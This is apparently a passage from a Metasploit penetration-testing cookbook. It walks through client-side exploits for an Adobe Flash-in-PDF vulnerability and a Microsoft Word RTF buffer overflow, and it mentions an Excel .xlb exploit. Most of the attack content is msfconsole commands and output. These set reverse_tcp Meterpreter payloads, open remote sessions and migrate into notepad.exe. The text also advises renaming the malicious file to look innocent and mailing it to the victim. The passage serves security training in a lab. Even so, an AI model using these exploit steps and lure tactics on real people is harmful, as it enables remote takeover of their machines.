This module exploits vulnerability in the DoABC tag handling within Versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash Player. Arbitrary code execution is gained by embedding a specially designed Flash movie into a PDF document. An AcroJS heap spray is often used in order to ensure that the memory used by the invalid pointer issue is controlled. This recipe actually gives us a scope of compromising a target machine by exploiting the vulnerability found in the Flash Player.
This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions, due to the hardcoded syscall number.
Getting ready
For this recipe, we are using Windows XP SP3 as the target machine and BackTrack 5 R3 as an attacker machine. To start with, simply start msfconsole and it will show you the following:
msf>
How to do it...
In this recipe, a specially crafted .swf file is embedded into the .pdf file. Now, our next aim is to make the victim open that file. Let us see how to do this:
msf > use exploit/exploit/wimdows/fileformat/adobe_flashplayer_
newfunction
msf exploit (adobe_flashplayer_newfunction) > set PAYLOAD windows/
meterpreter/reverse_tcp
msf exploit (adobe_flashplayer_newfunction) > set SRVHOST 192.168.1.101 SRVHOST => 192.168.1.101
msf exploit (adobe_flashplayer_newfunction) > set LHOST 192.168.1.101 LHOST => 192.168.1.101
msf exploit (adobe_flashplayer_newfunction) > exploit [*] Exploit running as background job.
[*] Server started.
msf exploit (adobe_flashplayer_newfunction) >
[*] Sending crafted PDF */SWF to 192.168.1.100:1039 [*] Sending stage (748032 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.100:4444 ->
192.168.1.101:1040)
[*] Session ID 1 (192.168.1.100:4444 -> 192.168.1.101:1040) processing InitialAutoRunScript 'migrate –f'
[*] Current server process : firefox.exe (3644) [*] Spawning a notepad.exe host process
[*] Migrating into process ID 3900
[*] New server process: notepad.exe (3900)
msf exploit (adobe_flashplayer_newfunction) > sessions -l Active sessions
Id Type Information Connection
1 meterpreter ERIC-FD2123B3C 192.168.1.100:1040 msf exploit (adobe_flashplayer_newfunction) > sessions -i 1
meterpreter>
How it works...
This event indicates the network transfer of SWF data that could exacerbate a new-function memory corruption in vulnerable Adobe Flash Player versions, and potentially lead to the execution of code supplied by a remote attacker. By persuading a victim to open a specially crafted PDF document, a remote attacker could exploit this vulnerability to corrupt memory and execute arbitrary code on the system with elevated privileges.
Understanding Microsoft Word RTF stack buffer overflow
Now, in this recipe, we will focus on another popular Windows tool called Microsoft Office. The RTF buffer overflow flaw exists in both the 2010 and 2007 versions of the Office software pack.
This vulnerability exists in the handling of the pfragments shape property within the Microsoft Word RTF parser. Let us understand this exploit in detail. I am assuming that we have already gained information about our target that it has Office pack installed on his/hersystem.
Getting ready
We will start by launching the msfconsole interface. The exploit we will be using in this recipe can be located at exploit/windows/fileformat/ms10_087_rtf_pfragments_
bof. The payload we will be using is windows/meterpreter/reverse_tcp to get shell connectivity with the target machine.
How to do it...
The working process will again be similar to what we have seen so far in previous recipes. We will first set our exploit. Then, we will select a payload and pass the relevant parameters for both in order to execute the exploit successfully. Let us perform these steps:
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/
meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_087_rtf_pfragments_bof) > show options
Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):
Name Current Setting Required Description
---- --- FILENAME msf.rtf yes The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- ---- ---
EXITFUNC process yes Exit technique: seh..
LHOST yes The listen address LPORT 4444 yes The listen port
Exploit target:
Id Name -- 0 Automatic
The exploit contains a parameter, FILENAME, which contains information about the malicious filename to be created. The default value is msf.rtf. Let us change it to some less suspicious name. We will also set the value for LHOST, which is the attacking machine's IP address:
msf exploit(ms10_087_rtf_pfragments_bof) > set FILENAME priceinfo.rtf FILENAME => priceinfo.rtf
msf exploit(ms10_087_rtf_pfragments_bof) > set LHOST 192.168.56.101 The filename has been changed to priceinfo.rtf and the value of LHOST has been set to 192.168.56.101. So, we are all set to execute the exploit module now:
msf exploit(ms10_087_rtf_pfragments_bof) > exploit
[*] Creating 'priceinfo.rtf' file ...
[+] priceinfo.rtf stored at /root/.msf4/local/priceinfo.rtf
Metasploit has created a malicious file for us, which we will have to use in order to proceed with the client-side attack. The file is located at /root/.msf4/local/priceinfo.rtf. Now, the next step is to send this file to the target user either through a mail or some other medium. Once the target user executes this malicious file, we will notice that it will open as a Word document. After a few seconds of execution, the Microsoft Word instance will either hang or crash depending upon the system. In the meantime, the malicious file successfully executes the exploit and provides an active session with the target. In order to make the connection persistent, the exploit migrates itself to some other process which will run in the background:
Sending stage (752128 bytes) to 192.168.56.1
[*] Meterpreter session 2 opened (192.168.56.101:4444 ->
192.168.56.1:57031) at 2011-11-13 23:16:20 +0530
[*] Session ID 2 (192.168.56.101:4444 -> 192.168.56.1:57031) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: WINWORD.EXE (5820) [*] Spawning notepad.exe process to migrate to [+] Migrating to 5556
[+] Successfully migrated to process
The first few lines of the command line show a successful execution of the exploit, which results in an active session with SESSION ID = 2. The last part of the command line shows that the exploit has successfully migrated from WINWORD.EXE to notepad.exe.
How it works...
The exploit module simply creates a malicious Word file that passes illegal values to the Word parser. The failure of the parser in recognizing the illegal values leads to a buffer overflow in it. Then, the payload comes into action, which executes the code to set up a back connection with the attacking machine. The success of this attack varies from machine to machine as there can be situations where Windows ASLR (Address Space Layout Randomization) can prevent execution of an arbitrary code (payload).
There's more...
There is another popular exploit available for the Office suite. I will leave it as a lesson for you to try. Here, I will give a brief overview about it.
Microsoft Excel 2007 buffer overflow
This known exploit targets the Microsoft Excel tool (.xlb) for Version 2007. Execution of a malicious .xlb file can lead to a stack-based buffer overflow and an arbitrary code execution.
The exploit can be located at exploit/windows/fileformat/ms11_021_xlb_bof.